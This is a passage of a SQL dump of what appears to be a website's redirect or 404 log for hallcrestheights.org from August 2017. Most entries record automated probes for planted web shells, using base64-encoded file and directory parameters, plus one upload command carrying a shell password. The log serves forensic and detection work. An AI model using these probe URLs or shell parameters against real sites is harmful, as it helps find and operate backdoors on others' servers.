00:00:00'),(11540,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-08-07 00:28:01','0000-00-00 00:00:00'),(11541,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:43','0000-00-00 00:00:00'),(11542,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:46','0000-00-00 00:00:00'),(11543,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-08-07 00:28:40','0000-00-00 00:00:00'),(11544,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:28:43','0000-00-00 00:00:00'),(11545,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:28:47','0000-00-00 00:00:00'),(11546,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:28:51','0000-00-00 00:00:00'),(11547,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:28:57','0000-00-00 00:00:00'),(11548,'http://hallcrestheights.org//head.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:27:43','0000-00-00 00:00:00'),(11549,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:27:48','0000-00-00 00:00:00'),(11550,'http://hallcrestheights.org//wp-content/plugins/morepaddy.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:27:53','0000-00-00 00:00:00'),(11551,'http://hallcrestheights.org//cache/list.php?z3=UHRZZ2pFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:27:58','0000-00-00 00:00:00'),(11552,'http://hallcrestheights.org//images/interface.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:29:20','0000-00-00 00:00:00'),(11553,'http://hallcrestheights.org//sqldebug.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:29:23','0000-00-00 00:00:00'),(11554,'http://hallcrestheights.org//xmlrpc-activate.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:29:26','0000-00-00 00:00:00'),(11555,'http://hallcrestheights.org//keep.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:30:06','0000-00-00 00:00:00'),(11556,'http://hallcrestheights.org//tmpos.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:30:09','0000-00-00 00:00:00'),(11557,'http://hallcrestheights.org//link.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:30:11','0000-00-00 00:00:00'),(11558,'http://hallcrestheights.org//dcodzu.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:28:55','0000-00-00 00:00:00'),(11559,'http://hallcrestheights.org//codd.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:30:49','0000-00-00 00:00:00'),(11560,'http://hallcrestheights.org//cache/wcache7675n.PHP?z3=UHRZZ2pFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:30:51','0000-00-00 00:00:00'),(11561,'http://hallcrestheights.org//modules/mod_bookmark/helper.php?z3=UHRZZ2pFLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:30:54','0000-00-00 00:00:00'),(11562,'http://hallcrestheights.org//content.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:30:58','0000-00-00 00:00:00'),(11563,'http://hallcrestheights.org//wp-content/plugins/sfn.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:29:43','0000-00-00 00:00:00'),(11564,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:31:05','0000-00-00 00:00:00'),(11565,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:31:08','0000-00-00 00:00:00'),(11566,'http://hallcrestheights.org//shootmei.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:31:11','0000-00-00 00:00:00'),(11567,'http://hallcrestheights.org//dcodqg.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:31:14','0000-00-00 00:00:00'),(11568,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/PtYgjE.php',NULL,'','',1,0,'2017-08-07 00:31:18','0000-00-00 00:00:00'),(11569,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/PtYgjE.php',NULL,'','',1,0,'2017-08-07 00:31:22','0000-00-00 00:00:00'),(11570,'http://hallcrestheights.org//wp-content/uploads/PtYgjE.php',NULL,'','',1,0,'2017-08-07 00:31:25','0000-00-00 00:00:00'),(11571,'http://hallcrestheights.org//PtYgjE.php',NULL,'','',1,0,'2017-08-07 00:31:28','0000-00-00 00:00:00'),(11572,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/PtYgjE.php',NULL,'','',1,0,'2017-08-07 00:32:02','0000-00-00 00:00:00'),(11573,'http://hallcrestheights.org//css/wp-settings.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-08-07 00:32:05','0000-00-00 00:00:00'),(11574,'http://hallcrestheights.org//wp-content/bk.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-08-07 00:35:57','0000-00-00 00:00:00'),(11575,'http://hallcrestheights.org//wp-content/plugins/easyrotator-for-wordpress/a.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:35:59','0000-00-00 00:00:00'),(11576,'http://hallcrestheights.org//modules/modules/modules.php?z3=UHRZZ2pFLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:36:05','0000-00-00 00:00:00'),(11577,'http://hallcrestheights.org//wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:36:07','0000-00-00 00:00:00'),(11578,'http://hallcrestheights.org//wp-content/themes/margreetalgra/404.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:36:10','0000-00-00 00:00:00'),(11579,'http://hallcrestheights.org//wp-content/themes/twentyeleven-child/footer.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:36:13','0000-00-00 00:00:00'),(11580,'http://hallcrestheights.org//wp-content/1ndex.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:36:16','0000-00-00 00:00:00'),(11581,'http://hallcrestheights.org//files/files.php?z3=UHRZZ2pFLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:36:19','0000-00-00 00:00:00'),(11582,'http://hallcrestheights.org//files/conn.php?z3=UHRZZ2pFLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-08-07 00:37:20','0000-00-00 00:00:00'),(11583,'http://hallcrestheights.org//libraries/joomla/1ndex.php?z3=UHRZZ2pFLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-08-07 00:37:56','0000-00-00 00:00:00'),(11584,'http://hallcrestheights.org/modules/mod_servises/system.php',NULL,'http://hallcrestheights.org/modules/mod_servises/system.php','',1,0,'2017-08-07 09:28:23','0000-00-00 00:00:00'),(11585,'http://www.hallcrestheights.org/k56623-oiyizgo-lrcmw-fbsnop/dgfnhs-krljr-i20162630-gfct-fzfiwx/',NULL,'','',1,0,'2017-08-07 12:50:59','0000-00-00 00:00:00'),(11586,'http://hallcrestheights.org/plugins/system/anticopy.php',NULL,'http://hallcrestheights.org/plugins/system/anticopy.php','',1,0,'2017-08-07 16:57:32','0000-00-00 00:00:00'),(11587,'http://hallcrestheights.org/includes/security.php',NULL,'http://hallcrestheights.org/includes/security.php','',1,0,'2017-08-07 17:33:54','0000-00-00 00:00:00'),(11588,'http://hallcrestheights.org/modules/mod_search/tmpl/newfile.php',NULL,'http://hallcrestheights.org/modules/mod_search/tmpl/newfile.php','',1,0,'2017-08-07 19:20:54','0000-00-00 00:00:00'),(11589,'http://hallcrestheights.org/modules/mod_joomlasec/mod_joomlasec.php',NULL,'http://hallcrestheights.org/modules/mod_joomlasec/mod_joomlasec.php','',1,0,'2017-08-07 19:23:33','0000-00-00 00:00:00'),(11590,'http://hallcrestheights.org/images/jmails.php?u',NULL,'http://hallcrestheights.org/images/jmails.php?u','',1,0,'2017-08-07 21:30:45','0000-00-00 00:00:00'),(11591,'http://hallcrestheights.org/functions.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-07 23:58:21','0000-00-00 00:00:00'),(11592,'http://hallcrestheights.org/configbak.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 23:58:48','0000-00-00 00:00:00'),(11593,'http://hallcrestheights.org/cache/cachee.php?z3=bWYweFRELnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 23:59:53','0000-00-00 00:00:00'),(11594,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:01:36','0000-00-00 00:00:00'),(11595,'http://hallcrestheights.org/maill.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:01:37','0000-00-00 00:00:00'),(11596,'http://hallcrestheights.org/wp-cache.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:01:40','0000-00-00 00:00:00'),(11597,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:03:07','0000-00-00 00:00:00'),(11598,'http://hallcrestheights.org/SessionController.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:03:09','0000-00-00 00:00:00'),(11599,'http://hallcrestheights.org/webconfig.txt.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:03:14','0000-00-00 00:00:00'),(11600,'http://hallcrestheights.org/news.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:03:17','0000-00-00 00:00:00'),(11601,'http://hallcrestheights.org/configurationbak.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:02:18','0000-00-00 00:00:00'),(11602,'http://hallcrestheights.org/robots.txt.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:02:53','0000-00-00 00:00:00'),(11603,'http://hallcrestheights.org/sql_dump.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:04:38','0000-00-00 00:00:00'),(11604,'http://hallcrestheights.org/jconfig.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:06:21','0000-00-00 00:00:00'),(11605,'http://hallcrestheights.org/thumb.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:06:24','0000-00-00 00:00:00'),(11606,'http://hallcrestheights.org/al277.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:07:25','0000-00-00 00:00:00'),(11607,'http://hallcrestheights.org/images/al277.php?z3=bWYweFRELnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:06:09','0000-00-00 00:00:00'),(11608,'http://hallcrestheights.org/wsdl.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:06:12','0000-00-00 00:00:00'),(11609,'http://hallcrestheights.org/wp-data.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:07:34','0000-00-00 00:00:00'),(11610,'http://hallcrestheights.org/media/1ndex.php?z3=bWYweFRELnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:08:00','0000-00-00 00:00:00'),(11611,'http://hallcrestheights.org/media/tmp.php?z3=bWYweFRELnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:08:03','0000-00-00 00:00:00'),(11612,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:08:09','0000-00-00 00:00:00'),(11613,'http://hallcrestheights.org/google-assist.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:08:43','0000-00-00 00:00:00'),(11614,'http://hallcrestheights.org/cache/defau1t.php?z3=bWYweFRELnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:10:47','0000-00-00 00:00:00'),(11615,'http://hallcrestheights.org/roubt.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:10:50','0000-00-00 00:00:00'),(11616,'http://hallcrestheights.org/bookmark.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:10:54','0000-00-00 00:00:00'),(11617,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:11:18','0000-00-00 00:00:00'),(11618,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:12:19','0000-00-00 00:00:00'),(11619,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:13:45','0000-00-00 00:00:00'),(11620,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:12:27','0000-00-00 00:00:00'),(11621,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:13:50','0000-00-00 00:00:00'),(11622,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:13:52','0000-00-00 00:00:00'),(11623,'http://hallcrestheights.org/modules/modules/modules.php?z3=bWYweFRELnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:13:35','0000-00-00 00:00:00'),(11624,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:13:38','0000-00-00 00:00:00'),(11625,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:14:59','0000-00-00 00:00:00'),(11626,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:13:42','0000-00-00 00:00:00'),(11627,'http://hallcrestheights.org/sqlbak.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:15:27','0000-00-00 00:00:00'),(11628,'http://hallcrestheights.org/images/stories/0day.php?z3=bWYweFRELnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:16:25','0000-00-00 00:00:00'),(11629,'http://hallcrestheights.org/install.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:16:29','0000-00-00 00:00:00'),(11630,'http://hallcrestheights.org/xmlsrpc.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:17:43','0000-00-00 00:00:00'),(11631,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:17:48','0000-00-00 00:00:00'),(11632,'http://hallcrestheights.org/shootmei.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:19:10','0000-00-00 00:00:00'),(11633,'http://hallcrestheights.org/infos.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:18:14','0000-00-00 00:00:00'),(11634,'http://hallcrestheights.org/content.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:20:06','0000-00-00 00:00:00'),(11635,'http://hallcrestheights.org/Abbrevsprl.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:21:01','0000-00-00 00:00:00'),(11636,'http://hallcrestheights.org/wp-content/1ndex.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:25:57','0000-00-00 00:00:00'),(11637,'http://hallcrestheights.org/authenticating.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-08 00:28:34','0000-00-00 00:00:00'),(11638,'http://hallcrestheights.org/show.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:28:35','0000-00-00 00:00:00'),(11639,'http://hallcrestheights.org/cache/news.php?z3=bWYweFRELnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:28:38','0000-00-00 00:00:00'),(11640,'http://hallcrestheights.org/images/head.php?z3=bWYweFRELnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:29:12','0000-00-00 00:00:00'),(11641,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:29:14','0000-00-00 00:00:00'),(11642,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:29:16','0000-00-00 00:00:00'),(11643,'http://hallcrestheights.org/files/files.php?z3=bWYweFRELnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:30:18','0000-00-00 00:00:00'),(11644,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=bWYweFRELnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:30:20','0000-00-00 00:00:00'),(11645,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/mf0xTD.php',NULL,'','',1,0,'2017-08-08 00:31:24','0000-00-00 00:00:00'),(11646,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/mf0xTD.php',NULL,'','',1,0,'2017-08-08 00:31:27','0000-00-00 00:00:00'),(11647,'http://hallcrestheights.org/wp-content/uploads/mf0xTD.php',NULL,'','',1,0,'2017-08-08 00:31:29','0000-00-00 00:00:00'),(11648,'http://hallcrestheights.org/mf0xTD.php',NULL,'','',1,0,'2017-08-08 00:31:31','0000-00-00 00:00:00'),(11649,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/mf0xTD.php',NULL,'','',1,0,'2017-08-08 00:31:33','0000-00-00 00:00:00'),(11650,'http://hallcrestheights.org/images/laj.php?z3=bWYweFRELnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:35:32','0000-00-00 00:00:00'),(11651,'http://hallcrestheights.org/log.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:34:19','0000-00-00 00:00:00'),(11652,'http://hallcrestheights.org/includes/u2p.php?z3=bWYweFRELnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:35:41','0000-00-00 00:00:00'),(11653,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=bWYweFRELnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:35:44','0000-00-00 00:00:00'),(11654,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=bWYweFRELnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:35:46','0000-00-00 00:00:00'),(11655,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=bWYweFRELnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:35:48','0000-00-00 00:00:00'),(11656,'http://hallcrestheights.org/wp-main.php?z3=bWYweFRELnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:35:53','0000-00-00 00:00:00'),(11657,'http://hallcrestheights.org/images/robots.txt.php?z3=bWYweFRELnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:34:35','0000-00-00 00:00:00'),(11658,'http://hallcrestheights.org/cli/40dd1d.php?z3=bWYweFRELnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-08-08 00:35:58','0000-00-00 00:00:00'),(11659,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php','',1,0,'2017-08-08 04:14:13','0000-00-00 00:00:00'),(11660,'http://hallcrestheights.org/language/includes.php',NULL,'http://hallcrestheights.org/language/includes.php','',2,0,'2017-08-08 05:29:38','0000-00-00 00:00:00'),(11661,'http://hallcrestheights.org/images/jquery.php',NULL,'http://hallcrestheights.org/images/jquery.php','',1,0,'2017-08-08 05:42:27','0000-00-00 00:00:00'),(11662,'http://hallcrestheights.org/tmp/1.php',NULL,'http://hallcrestheights.org/tmp/1.php','',3,0,'2017-08-08 06:13:54','0000-00-00 00:00:00'),(11663,'http://hallcrestheights.org/images/tmp.php',NULL,'http://hallcrestheights.org/images/tmp.php','',1,0,'2017-08-08 09:42:05','0000-00-00 00:00:00'),(11664,'http://hallcrestheights.org/modules/mod_ariimageslider/mod_ariimageslider.php',NULL,'http://hallcrestheights.org/modules/mod_ariimageslider/mod_ariimageslider.php','',1,0,'2017-08-08 19:04:51','0000-00-00 00:00:00'),(11665,'http://hallcrestheights.org/images/fix.php',NULL,'http://hallcrestheights.org/images/fix.php','',1,0,'2017-08-08 21:49:36','0000-00-00 00:00:00'),(11666,'http://hallcrestheights.org//wp-content/bk.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-08-09 01:55:21','0000-00-00 00:00:00'),(11667,'http://hallcrestheights.org//functions.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 01:55:45','0000-00-00 00:00:00'),(11668,'http://hallcrestheights.org//images/1ndex.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:55:46','0000-00-00 00:00:00'),(11669,'http://hallcrestheights.org//tmp.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-08-09 01:55:49','0000-00-00 00:00:00'),(11670,'http://hallcrestheights.org//configbak.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:56:57','0000-00-00 00:00:00'),(11671,'http://hallcrestheights.org//images/defau1t.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-08-09 01:56:01','0000-00-00 00:00:00'),(11672,'http://hallcrestheights.org//cache/cachee.php?z3=MDU0T2s2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:57:22','0000-00-00 00:00:00'),(11673,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-08-09 01:57:46','0000-00-00 00:00:00'),(11674,'http://hallcrestheights.org//maill.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:57:47','0000-00-00 00:00:00'),(11675,'http://hallcrestheights.org//wp-cache.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:57:49','0000-00-00 